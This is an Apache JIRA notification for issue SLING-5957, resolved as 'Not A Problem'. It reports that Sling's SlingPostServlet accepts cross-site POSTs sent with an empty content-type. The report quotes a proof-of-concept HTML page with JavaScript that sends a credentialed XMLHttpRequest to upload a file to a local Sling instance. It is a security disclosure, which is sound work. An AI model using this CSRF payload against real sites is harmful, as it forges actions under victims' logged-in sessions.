[
https://issues.apache.org/jira/browse/SLING-5957?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Carsten Ziegeler resolved SLING-5957.
-------------------------------------
Resolution: Not A Problem
> SlingPostServlet: susceptible CSRF with empty content-type
> ----------------------------------------------------------
>
> Key: SLING-5957
> URL: https://issues.apache.org/jira/browse/SLING-5957
> Project: Sling
> Issue Type: Bug
> Components: Servlets
> Reporter: Dominique Jäggi
> Labels: csrf, security
>
> The _SlingPostServlet_ creates a resource from a cross-site request like so:
> {code}
> <html>
> <body>
> <script>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:8080/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
> </script>
> <form action="#">
> <input type="button" value="Submit request" onclick="submitRequest();"
> />
> </form>
> </body>
> </html>
> {code}
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
